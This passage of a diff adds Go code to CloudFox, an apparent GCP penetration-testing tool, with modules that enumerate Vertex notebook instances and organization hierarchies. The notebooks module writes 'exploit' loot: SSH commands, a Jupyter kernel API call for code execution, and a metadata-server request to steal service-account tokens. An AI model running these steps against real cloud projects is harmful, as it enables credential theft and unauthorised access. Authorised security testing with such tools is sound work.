globals.GCP_NOTEBOOKS_MODULE_NAME, + fmt.Sprintf("Could not list notebook instances in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectInstances[projectID] = instances + for _, instance := range instances { + m.addToLoot(projectID, instance) + } + m.mu.Unlock() + } + + // Get runtimes (might not be available in all projects) + runtimes, err := svc.ListRuntimes(projectID) + if err != nil { + // Don't increment error counter - runtimes API may not be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list runtimes in project %s (may not be enabled)", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.ProjectRuntimes[projectID] = runtimes + m.mu.Unlock() + } +} + +func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice.NotebookInstanceInfo) { + lootFile := m.LootMap[projectID]["notebooks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NOTEBOOK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# State: %s, Service Account: %s\n"+ + "# Public IP: %s, Proxy Access: %s\n", + instance.Name, + instance.ProjectID, instance.Location, + instance.State, instance.ServiceAccount, + shared.BoolToYesNo(!instance.NoPublicIP), shared.BoolToYesNo(!instance.NoProxyAccess), + ) + + if instance.ProxyUri != "" { + lootFile.Contents += fmt.Sprintf( + "# Proxy URI: %s\n", instance.ProxyUri) + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud notebooks instances describe %s --location=%s --project=%s + +# Get JupyterLab proxy URL: +gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)' + +# Start instance (if stopped): +gcloud notebooks instances start %s --location=%s --project=%s + +# Stop instance: +gcloud notebooks instances stop %s --location=%s --project=%s + +# Get instance metadata (service account, network config): +gcloud notebooks instances describe %s --location=%s --project=%s --format=json | jq '{serviceAccount: .serviceAccount, network: .network, subnet: .subnet}' + +`, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to notebook instance + if !instance.NoPublicIP { + lootFile.Contents += fmt.Sprintf( + "# SSH to notebook instance (runs as SA: %s):\n"+ + "gcloud compute ssh --project=%s --zone=%s notebook-instance-%s\n\n", + instance.ServiceAccount, + instance.ProjectID, instance.Location, instance.Name, + ) + } + lootFile.Contents += fmt.Sprintf( + "# SSH through IAP (if direct SSH blocked or no public IP):\n"+ + "gcloud compute ssh notebook-instance-%s --tunnel-through-iap --project=%s --zone=%s\n\n", + instance.Name, instance.ProjectID, instance.Location, + ) + + // JupyterLab code execution + if instance.ProxyUri != "" { + lootFile.Contents += fmt.Sprintf( + "# Execute code via Jupyter API (runs as SA: %s):\n"+ + "# Access JupyterLab: %s\n\n"+ + "# Create and execute a notebook via Jupyter REST API:\n"+ + "# Step 1: Get Jupyter token (via proxy auth)\n"+ + "# Step 2: Execute arbitrary code:\n"+ + "curl -X POST '%s/api/kernels' -H 'Content-Type: application/json' -d '{\"name\": \"python3\"}'\n\n"+ + "# Execute Python code to steal SA token:\n"+ + "# In JupyterLab terminal or notebook cell:\n"+ + "# import requests\n"+ + "# r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'})\n"+ + "# print(r.json())\n\n", + instance.ServiceAccount, + instance.ProxyUri, + instance.ProxyUri, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# Start instance to get Jupyter proxy URL, then execute code as SA: %s\n"+ + "gcloud notebooks instances start %s --location=%s --project=%s\n\n", + instance.ServiceAccount, + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Upload notebook with code execution + lootFile.Contents += fmt.Sprintf( + "# Register an instance (Vertex AI Workbench):\n"+ + "gcloud notebooks instances register %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) +} + +func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *NotebooksModule) getInstancesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "SA Attack Paths", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } +} + +func (m *NotebooksModule) getRuntimesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "SA Attack Paths", + "Network", + "Subnet", + } +} + +func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.NotebookInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + gpu := "-" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) + } + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + attackPaths, + network, + subnet, + shared.BoolToYesNo(!instance.NoPublicIP), + shared.BoolToYesNo(!instance.NoProxyAccess), + proxyUri, + gpu, + creator, + }) + } + return body +} + +func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.RuntimeInfo) [][]string { + var body [][]string + for _, runtime := range runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "-" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } + body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + sa, + attackPaths, + network, + subnet, + }) + } + return body +} + +func (m *NotebooksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if runtimes, ok := m.ProjectRuntimes[projectID]; ok && len(runtimes) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-runtimes", + Header: m.getRuntimesHeader(), + Body: m.runtimesToTableBody(runtimes), + }) + } + + return tableFiles +} + +func (m *NotebooksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRuntimes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = NotebooksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} + +func (m *NotebooksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allRuntimes) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-runtimes", + Header: m.getRuntimesHeader(), + Body: m.runtimesToTableBody(allRuntimes), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := NotebooksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go new file mode 100755 index 00000000..c8682be7 --- /dev/null +++ b/gcp/commands/organizations.go @@ -0,0 +1,961 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrganizationsCommand = &cobra.Command{ + Use: globals.GCP_ORGANIZATIONS_MODULE_NAME, + Aliases: []string{"org", "orgs", "hierarchy"}, + Short: "Enumerate GCP organization hierarchy", + Long: `Enumerate GCP organization, folder, and project hierarchy. + +Features: +- Lists accessible organizations +- Shows folder structure +- Maps project relationships +- Displays resource hierarchy tree +- Shows ancestry paths for projects`, + Run: runGCPOrganizationsCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type OrganizationsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Organizations []orgsservice.OrganizationInfo + Folders []orgsservice.FolderInfo + Projects []orgsservice.ProjectInfo + Ancestry [][]orgsservice.HierarchyNode + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type OrganizationsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrganizationsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrganizationsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGANIZATIONS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &OrganizationsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Organizations: []orgsservice.OrganizationInfo{}, + Folders: []orgsservice.FolderInfo{}, + Projects: []orgsservice.ProjectInfo{}, + Ancestry: [][]orgsservice.HierarchyNode{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Check if org cache is available (auto-loaded at startup) + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && orgCache.IsPopulated() { + logger.InfoM("Using cached organization data", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range orgCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range orgCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range orgCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } else { + // No context cache, try loading from disk cache + diskCache, metadata, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, %d projects)", + metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.TotalProjects), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range diskCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range diskCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range diskCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } else { + // No disk cache either, enumerate directly and save + logger.InfoM("Enumerating organizations, folders, and projects...", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Get organizations + orgs, err := orgsSvc.SearchOrganizations() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Organizations = orgs + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Folders = folders + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Projects = projects + } + + // Save to disk cache for future use + m.saveToOrgCache(logger) + } + } + + // Get ancestry for each specified project + for _, projectID := range m.ProjectIDs { + ancestry, err := orgsSvc.GetProjectAncestry(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s: %v", projectID, err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Ancestry = append(m.Ancestry, ancestry) + } + } + + // Generate loot + m.generateLoot() + + // Report findings + logger.SuccessM(fmt.Sprintf("Found %d organization(s), %d folder(s), %d project(s)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *OrganizationsModule) initializeLootFiles() { + m.LootMap["org-commands"] = &internal.LootFile{ + Name: "org-commands", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["org-map"] = &internal.LootFile{ + Name: "org-map", + Contents: "", + } + m.LootMap["org-tree"] = &internal.LootFile{ + Name: "org-tree", + Contents: "", + } + m.LootMap["org-scope-hierarchy"] = &internal.LootFile{ + Name: "org-scope-hierarchy", + Contents: "", + } +} + +func (m *OrganizationsModule) generateLoot() { + // Generate expandable markdown tree view (org map) + m.generateMarkdownTreeView() + + // Generate standard ASCII tree view + m.generateTextTreeView() + + // Generate linear hierarchy for scoped projects only + m.generateScopeHierarchy() + + // Gcloud commands for organizations + m.LootMap["org-commands"].Contents += "# =============================================================================\n" + m.LootMap["org-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["org-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORGANIZATION: %s (%s)\n"+ + "# =============================================================================\n"+ + "gcloud organizations describe %s\n"+ + "gcloud organizations get-iam-policy %s\n"+ + "gcloud resource-manager folders list --organization=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + org.DisplayName, orgID, + orgID, + orgID, + orgID, + orgID, + ) + } + + // Gcloud commands for folders + if len(m.Folders) > 0 { + m.LootMap["org-commands"].Contents += "# =============================================================================\n" + m.LootMap["org-commands"].Contents += "# FOLDER COMMANDS\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n\n" + + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["org-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FOLDER: %s (%s)\n"+ + "# =============================================================================\n"+ + "gcloud resource-manager folders describe %s\n"+ + "gcloud resource-manager folders get-iam-policy %s\n"+ + "gcloud resource-manager folders list --folder=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + folder.DisplayName, folderID, + folderID, + folderID, + folderID, + folderID, + ) + } + } +} + +// generateMarkdownTreeView creates a beautified expandable markdown tree of the organization hierarchy +func (m *OrganizationsModule) generateMarkdownTreeView() { + tree := &m.LootMap["org-map"].Contents + + *tree += "# GCP Organization Hierarchy\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + displayName := org.DisplayName + if displayName == "" { + displayName = orgID + } + + // Get direct children (folders and projects) of this org + childFolders := m.getChildFolders(org.Name) + childProjects := m.getChildProjects(org.Name) + + // Start expandable section for organization + *tree += fmt.Sprintf("
\n🏢 Organization: %s (%s)\n\n", displayName, orgID) + + // Add folders as expandable sections + for _, folder := range childFolders { + m.addFolderToMarkdownTree(tree, folder, 1) + } + + // Add projects directly under org + if len(childProjects) > 0 { + for _, proj := range childProjects { + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID) + } + *tree += "\n" + } + + *tree += "
\n\n" + } + + // Handle standalone projects (no org parent) + standaloneProjects := m.getStandaloneProjects() + if len(standaloneProjects) > 0 { + *tree += "
\n📦 Standalone Projects (no organization)\n\n" + for _, proj := range standaloneProjects { + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", displayName, proj.ProjectID) + } + *tree += "\n
\n" + } +} + +// addFolderToMarkdownTree recursively adds a folder and its children as expandable markdown +func (m *OrganizationsModule) addFolderToMarkdownTree(tree *string, folder orgsservice.FolderInfo, depth int) { + folderID := strings.TrimPrefix(folder.Name, "folders/") + displayName := folder.DisplayName + if displayName == "" { + displayName = folderID + } + + // Get children of this folder + childFolders := m.getChildFolders(folder.Name) + childProjects := m.getChildProjects(folder.Name) + + hasChildren := len(childFolders) > 0 || len(childProjects) > 0 + + if hasChildren { + // Folder with children - make it expandable + *tree += fmt.Sprintf("
\n📂 Folder: %s (%s)\n\n", displayName, folderID) + + // Add child folders + for _, childFolder := range childFolders { + m.addFolderToMarkdownTree(tree, childFolder, depth+1) + } + + // Add child projects + for _, proj := range childProjects { + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID) + } + + *tree += "\n
\n\n" + } else { + // Empty folder - just a list item + *tree += fmt.Sprintf("- 📂 **Folder:** %s (`%s`) *(empty)*\n", displayName, folderID) + } +} + +// generateTextTreeView creates a standard ASCII tree of the organization hierarchy +func (m *OrganizationsModule) generateTextTreeView() { + tree := &m.LootMap["org-tree"].Contents + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + displayName := org.DisplayName + if displayName == "" { + displayName = orgID + } + *tree += fmt.Sprintf("Organization: %s (%s)\n", displayName, orgID) + + // Get direct children (folders and projects) of this org + childFolders := m.getChildFolders(org.Name) + childProjects := m.getChildProjects(org.Name) + + totalChildren := len(childFolders) + len(childProjects) + childIndex := 0 + + // Add folders + for _, folder := range childFolders { + childIndex++ + isLast := childIndex == totalChildren + m.addFolderToTextTree(tree, folder, "", isLast) + } + + // Add projects directly under org + for _, proj := range childProjects { + childIndex++ + isLast := childIndex == totalChildren + prefix := "├── " + if isLast { + prefix = "└── " + } + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, projDisplayName, proj.ProjectID) + } + + *tree += "\n" + } + + // Handle standalone projects (no org parent) + standaloneProjects := m.getStandaloneProjects() + if len(standaloneProjects) > 0 { + *tree += "Standalone Projects (no organization):\n" + for i, proj := range standaloneProjects { + isLast := i == len(standaloneProjects)-1 + prefix := "├── " + if isLast { + prefix = "└── " + } + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, displayName, proj.ProjectID) + } + } +} + +// addFolderToTextTree recursively adds a folder and its children to the ASCII tree +func (m *OrganizationsModule) addFolderToTextTree(tree *string, folder orgsservice.FolderInfo, indent string, isLast bool) { + folderID := strings.TrimPrefix(folder.Name, "folders/") + displayName := folder.DisplayName + if displayName == "" { + displayName = folderID + } + + // Determine the prefix for this item + prefix := "├── " + if isLast { + prefix = "└── " + } + + *tree += fmt.Sprintf("%s%sFolder: %s (%s)\n", indent, prefix, displayName, folderID) + + // Determine the indent for children + childIndent := indent + "│ " + if isLast { + childIndent = indent + " " + } + + // Get children of this folder + childFolders := m.getChildFolders(folder.Name) + childProjects := m.getChildProjects(folder.Name) + + totalChildren := len(childFolders) + len(childProjects) + childIndex := 0 + + // Add child folders + for _, childFolder := range childFolders { + childIndex++ + childIsLast := childIndex == totalChildren + m.addFolderToTextTree(tree, childFolder, childIndent, childIsLast) + } + + // Add child projects + for _, proj := range childProjects { + childIndex++ + childIsLast := childIndex == totalChildren + childPrefix := "├── " + if childIsLast { + childPrefix = "└── " + } + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("%s%sProject: %s (%s)\n", childIndent, childPrefix, projDisplayName, proj.ProjectID) + } +} + +// generateScopeHierarchy creates a linear hierarchy view for only the projects in scope (-p or -l) +func (m *OrganizationsModule) generateScopeHierarchy() { + hierarchy := &m.LootMap["org-scope-hierarchy"].Contents + + *hierarchy = "# GCP Scope Hierarchy\n" + *hierarchy += "# Linear hierarchy paths for projects in scope\n" + *hierarchy += "# Generated by CloudFox\n\n" + + if len(m.ProjectIDs) == 0 { + *hierarchy += "No projects in scope.\n" + return + } + + // For each project in scope, show its full hierarchy path + for _, projectID := range m.ProjectIDs { + // Find the project info + var projectInfo *orgsservice.ProjectInfo + for i := range m.Projects { + if m.Projects[i].ProjectID == projectID { + projectInfo = &m.Projects[i] + break + } + } + + if projectInfo == nil { + *hierarchy += fmt.Sprintf("Project: %s (not found in hierarchy)\n\n", projectID) + continue + } + + // Build the hierarchy path from project up to org + path := m.buildHierarchyPath(projectInfo) + + // Output the linear path + projectName := projectInfo.DisplayName + if projectName == "" { + projectName = projectID + } + + *hierarchy += fmt.Sprintf("## %s (%s)\n", projectName, projectID) + + // Show path from org down to project + for i, node := range path { + indent := strings.Repeat(" ", i) + *hierarchy += fmt.Sprintf("%s%s\n", indent, node) + } + *hierarchy += "\n" + } +} + +// buildHierarchyPath builds the hierarchy path from org down to project +func (m *OrganizationsModule) buildHierarchyPath(project *orgsservice.ProjectInfo) []string { + var path []string + + // Start from the project and work up + var reversePath []string + + // Add project + projectName := project.DisplayName + if projectName == "" { + projectName = project.ProjectID + } + reversePath = append(reversePath, fmt.Sprintf("└── Project: %s (%s)", projectName, project.ProjectID)) + + // Traverse up the hierarchy + currentParent := project.Parent + for currentParent != "" { + if strings.HasPrefix(currentParent, "folders/") { + folderID := strings.TrimPrefix(currentParent, "folders/") + folderName := m.getFolderName(folderID) + reversePath = append(reversePath, fmt.Sprintf("└── Folder: %s (%s)", folderName, folderID)) + + // Find the folder's parent + for _, folder := range m.Folders { + if folder.Name == currentParent { + currentParent = folder.Parent + break + } + } + } else if strings.HasPrefix(currentParent, "organizations/") { + orgID := strings.TrimPrefix(currentParent, "organizations/") + orgName := m.getOrgName(orgID) + reversePath = append(reversePath, fmt.Sprintf("Organization: %s (%s)", orgName, orgID)) + break + } else { + break + } + } + + // Reverse to get org -> folder -> project order + for i := len(reversePath) - 1; i >= 0; i-- { + path = append(path, reversePath[i]) + } + + return path +} + +// getChildFolders returns folders that are direct children of the given parent +func (m *OrganizationsModule) getChildFolders(parentName string) []orgsservice.FolderInfo { + var children []orgsservice.FolderInfo + for _, folder := range m.Folders { + if folder.Parent == parentName { + children = append(children, folder) + } + } + return children +} + +// getChildProjects returns projects that are direct children of the given parent +func (m *OrganizationsModule) getChildProjects(parentName string) []orgsservice.ProjectInfo { + var children []orgsservice.ProjectInfo + for _, proj := range m.Projects { + if proj.Parent == parentName { + children = append(children, proj) + } + } + return children +} + +// getStandaloneProjects returns projects that don't belong to any organization +func (m *OrganizationsModule) getStandaloneProjects() []orgsservice.ProjectInfo { + var standalone []orgsservice.ProjectInfo + for _, proj := range m.Projects { + // Check if parent is not an org or folder + if !strings.HasPrefix(proj.Parent, "organizations/") && !strings.HasPrefix(proj.Parent, "folders/") { + standalone = append(standalone, proj) + } + } + return standalone +} + +// getFolderName returns the display name for a folder ID +func (m *OrganizationsModule) getFolderName(folderID string) string { + for _, folder := range m.Folders { + id := strings.TrimPrefix(folder.Name, "folders/") + if id == folderID { + if folder.DisplayName != "" { + return folder.DisplayName + } + return folderID + } + } + return folderID +} + +// getOrgName returns the display name for an organization ID +func (m *OrganizationsModule) getOrgName(orgID string) string { + for _, org := range m.Organizations { + id := strings.TrimPrefix(org.Name, "organizations/") + if id == orgID { + if org.DisplayName != "" { + return org.DisplayName + } + return orgID + } + } + return orgID +} + +// saveToOrgCache saves enumerated org data to disk cache +func (m *OrganizationsModule) saveToOrgCache(logger internal.Logger) { + cache := gcpinternal.NewOrgCache() + + // Convert module data to cache format + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: orgID, + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folderID, + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range m.Projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Number: projectNumber, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + cache.MarkPopulated() + + // Save to disk + err := gcpinternal.SaveOrgCacheToFile(cache, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save org cache: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Saved org cache to disk (%d orgs, %d folders, %d projects)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrganizationsModule) buildTables() []internal.TableFile { + // Organizations table + orgsHeader := []string{ + "Organization ID", + "Display Name", + "State", + "Directory ID", + } + + var orgsBody [][]string + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgsBody = append(orgsBody, []string{ + orgID, + org.DisplayName, + org.State, + org.DirectoryID, + }) + } + + // Folders table + foldersHeader := []string{ + "Folder ID", + "Display Name", + "Parent", + "State", + } + + var foldersBody [][]string + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + foldersBody = append(foldersBody, []string{ + folderID, + folder.DisplayName, + folder.Parent, + folder.State, + }) + } + + // Projects table + projectsHeader := []string{ + "Project ID", + "Project Name", + "Display Name", + "Parent", + "State", + } + + var projectsBody [][]string + for _, proj := range m.Projects { + projectsBody = 